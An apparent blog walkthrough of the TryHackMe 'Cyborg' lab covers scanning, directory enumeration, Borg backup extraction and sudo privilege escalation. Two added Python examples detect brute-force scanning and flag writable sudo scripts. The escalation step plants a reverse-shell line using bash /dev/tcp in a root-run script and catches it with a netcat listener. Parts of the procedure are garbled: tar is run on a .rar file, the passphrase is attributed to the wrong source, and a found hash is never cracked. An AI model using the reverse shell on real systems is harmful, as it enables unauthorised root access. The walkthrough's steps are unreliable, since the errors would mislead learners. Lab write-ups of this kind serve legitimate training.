Unlocking the Digital Fortress: A Step-by-Step Journey Through the…
In the vast and ever-evolving landscape of cybersecurity, challenges like the TryHackMe Cyborg offer a thrilling opportunity to test and hone our skills. This isn’t just about breaking into a system; it’s about understanding the intricacies of web enumeration, SSH, and privilege escalation. So, let’s embark on this digital adventure, step by step, and unravel the secrets of the Cyborg challenge.
Understanding the Machine
Before we dive into the action, it’s essential to understand the machine we’re dealing with. The Cyborg challenge is hosted on a Linux system and is rated as easy, making it an excellent starting point for those new to cybersecurity. The primary skills required are web enumeration, SSH, and privilege escalation. These skills are fundamental in the cybersecurity world and are often the first steps in many penetration testing engagements.
Step 1: Scanning the Target
Our journey begins with a scan of the target machine. We’ll use nmap, a powerful network scanning tool, to identify open ports and services running on the target.
nmap -p- -sV
The scan reveals two open ports: Port 22, which is running SSH (Secure Shell), and Port 80, which is running HTTP (Hypertext Transfer Protocol). Port 80 is the standard port for web servers, so it’s a good place to start our investigation.
Exploring Port 80
When we visit the website hosted on Port 80, we’re greeted with a default Apache page. This is a common sight in cybersecurity challenges, as it indicates that the server is running Apache but hasn’t been customized yet. This is our cue to start web enumeration.
Step 2: Enumerating the Web
Web enumeration is the process of discovering hidden directories and files on a web server. We’ll use Gobuster, a popular directory brute-forcing tool, to uncover these hidden gems.
gobuster dir -u http://
The scan reveals two interesting directories: /admin and /etc. These directories are often used to store sensitive information, so they’re worth investigating further.
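Seen from the server side, a directory brute-force run like this shows up in the web access log as one client collecting a long run of 404 responses, and the few non-404 answers show exactly what it found. The following Python is an added example, not part of the original walkthrough; the log lines, IP addresses and thresholds are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache "combined" format: client, identity, user, [time], "METHOD path proto", status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def _line(ip, path, status):
    """Build one constructed access-log line (sample data only)."""
    return f'{ip} - - [10/Jan/2024:10:00:00 +0000] "GET {path} HTTP/1.1" {status} 300 "-" "-"'


# Constructed sample: one client guessing 40 names and finding two directories,
# plus one ordinary visitor. Addresses are from documentation ranges.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", f"/word{i}", 404) for i in range(40)]
    + [_line("203.0.113.7", "/admin", 301), _line("203.0.113.7", "/etc", 301)]
    + [_line("198.51.100.20", "/", 200), _line("198.51.100.20", "/favicon.ico", 404)]
)


def summarize(log_text):
    """Per client: total requests, 404 count, and paths answered with a non-404 status."""
    stats = defaultdict(lambda: {"total": 0, "not_found": 0, "hits": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _ts, _method, path, status = m.groups()
        entry = stats[ip]
        entry["total"] += 1
        if status == "404":
            entry["not_found"] += 1
        else:
            entry["hits"].add(path)
    return stats


def find_scanners(log_text, min_requests=20, min_404_ratio=0.8):
    """Map each client that looks like a path brute-forcer to the paths it discovered."""
    flagged = {}
    for ip, s in summarize(log_text).items():
        if s["total"] >= min_requests and s["not_found"] / s["total"] >= min_404_ratio:
            flagged[ip] = sorted(s["hits"])
    return flagged
```

The returned path list is the part worth acting on: it is the content an anonymous client was able to reach, here the /admin and /etc directories.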
Investigating the /admin Directory
When we navigate to the /admin directory, we find a chat log. This log contains valuable information about the system’s configuration and potential vulnerabilities. It mentions a Squid proxy, a backup tool called Borg, and a password for the Borg backup.
Investigating the /etc Directory
On a Linux system, /etc holds system configuration files, and here the web server exposes a directory of that name. In this case, it contains a hash. This hash is likely a password hash, and it’s our next target for cracking.
Step 3: Unarchiving the Archive
The chat log mentions a backup called “music_archive”. We’ll use this information to find the backup file. We’ll use the tar command to extract the contents of the archive.rar file.
tar -xvf archive.rar
The extraction reveals a directory structure with several files. The README and config files mention Borg, a deduplicating backup tool that is popular for its efficiency, security, and ease of use.
Extracting the Borg Archive
To extract the Borg archive, we’ll use the borg extract command. However, we’ll need a passphrase to do this. The chat log mentions the passphrase “music_archive”, so we’ll use that.
borg extract `pwd`::music_archive
The extraction reveals a Download directory. This directory contains an SSH key. We’ll use this key to log into the server as the user alex.
Step 4: Privilege Escalation
Now that we’re logged in as alex, we’ll check our sudo privileges. We’ll use the sudo -l command to do this.
sudo -l
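The command reveals that we can execute backup.sh as root. This is a common privilege escalation vector: a sudo rule that runs a script as root is only as safe as the script’s file permissions, so a script the invoking user can edit lets that user run anything as root.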
Exploiting the backup.sh Script
To exploit the backup.sh script, we’ll need to understand how it works. We’ll use the cat command to view the contents of the script.
cat backup.sh
The script contains a command that backs up the /var/www/html directory to the /var/backups directory. We’ll modify this command to give us a shell as root.
echo 'bash -i >& /dev/tcp/
We’ll then set up a netcat listener on our attacker machine to catch the shell.
nc -lvnp
Finally, we’ll execute the backup.sh script as root.
sudo /home/alex/backup.sh
And just like that, we’ve gained root access to the system.
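On the defensive side, the weakness in this step is a sudo rule that points at a script the unprivileged user can change. The following Python is an added example, not part of the original walkthrough: it pulls command paths out of `sudo -l` output and flags the file and any ancestor directory that is not owned by root or is writable by group or others. The sample output (including the NOPASSWD tag) is constructed; only the /home/alex/backup.sh path comes from this page.

```python
import os
import re
import stat

# Constructed sample of `sudo -l` output; only the script path comes from the walkthrough.
SAMPLE_SUDO_L = """\
User alex may run the following commands on this host:
    (root) NOPASSWD: /home/alex/backup.sh
"""

# "(run-as) [TAG: ...] /absolute/command" lines; rules such as "(ALL) ALL" are skipped.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s+(?:[A-Z]+:\s*)*(/\S+)", re.M)


def sudo_targets(sudo_l_output):
    """Return (run-as, command path) pairs from `sudo -l` style output."""
    return RULE_RE.findall(sudo_l_output)


def untrusted_components(path, trusted_uids=(0,), stop_at="/"):
    """Check the command file and every ancestor directory up to stop_at.

    Returns (component, reason) for each one that an account outside
    trusted_uids could modify or replace.
    """
    findings = []
    current = os.path.realpath(path)  # resolve symlinks so the real inodes are checked
    stop_at = os.path.realpath(stop_at)
    while True:
        try:
            st = os.stat(current)
        except FileNotFoundError:
            findings.append((current, "missing"))
        else:
            if st.st_uid not in trusted_uids:
                findings.append((current, f"owned by uid {st.st_uid}"))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((current, "group- or world-writable"))
        parent = os.path.dirname(current)
        if current == stop_at or parent == current:
            break
        current = parent
    return findings


if __name__ == "__main__":
    for run_as, command in sudo_targets(SAMPLE_SUDO_L):
        for component, reason in untrusted_components(command):
            print(f"{run_as}: {command}: {component} is {reason}")
```

Any finding means the rule should point at a root-owned script in a root-owned directory, or be removed.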
Conclusion
The TryHackMe Cyborg challenge is a fantastic way to test and hone our cybersecurity skills. It’s a step-by-step journey that takes us from web enumeration to privilege escalation. Each step is a learning opportunity, and each challenge is a test of our knowledge and skills.
Remember, cybersecurity is a journey, not a destination. Each challenge is an opportunity to learn and grow. So, keep practicing, keep learning, and most importantly, keep having fun.
FAQ
What is the Cyborg challenge?
The Cyborg challenge is a cybersecurity challenge hosted on the TryHackMe platform. It’s designed to test and hone skills in web enumeration, SSH, and privilege escalation.
What skills are required for the Cyborg challenge?
The primary skills required for the Cyborg challenge are web enumeration, SSH, and privilege escalation. These skills are fundamental in the cybersecurity world and are often the first steps in many penetration testing engagements.
What tools are used in the Cyborg challenge?
The tools used in the Cyborg challenge include nmap, Gobuster, Borg, and netcat. These tools are popular in the cybersecurity world and are often used in penetration testing engagements.
How do I get started with the Cyborg challenge?
To get started with the Cyborg challenge, you’ll need to create a TryHackMe account and join the Cyborg challenge. Once you’ve joined the challenge, you can start following the steps outlined in this walkthrough.
What is the difficulty level of the Cyborg challenge?
The Cyborg challenge is rated as easy, making it an excellent starting point for those new to cybersecurity. However, even experienced cybersecurity professionals can learn and grow from this challenge.
What is the purpose of the Cyborg challenge?
The purpose of the Cyborg challenge is to test and hone skills in web enumeration, SSH, and privilege escalation. It’s also a learning opportunity for those new to cybersecurity, as it provides a step-by-step journey through the penetration testing process.
